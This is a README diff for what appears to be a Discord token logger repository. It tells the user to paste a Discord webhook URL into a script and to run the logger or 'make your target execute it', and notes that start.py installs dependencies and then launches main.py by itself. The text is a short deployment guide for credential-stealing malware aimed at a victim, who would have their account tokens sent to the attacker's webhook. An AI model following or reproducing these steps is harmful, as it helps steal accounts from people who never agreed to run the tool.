brows3r/Advanced-Token-Logger/README.md

 In the file "38.py" go to line 88 and replace the text with your discord webhook url.

 # How to Run
-Execute the token logger by double clicking it or doing "python [file name].py"
+Execute the token logger by double clicking it or doing "python main.py".
+But before you execute it or make your target execute it, double check that all the requirements have been install via manual installation or by running "start.py".
+Remember, if "start.py" works and installs everything it will automatically execute "main.py"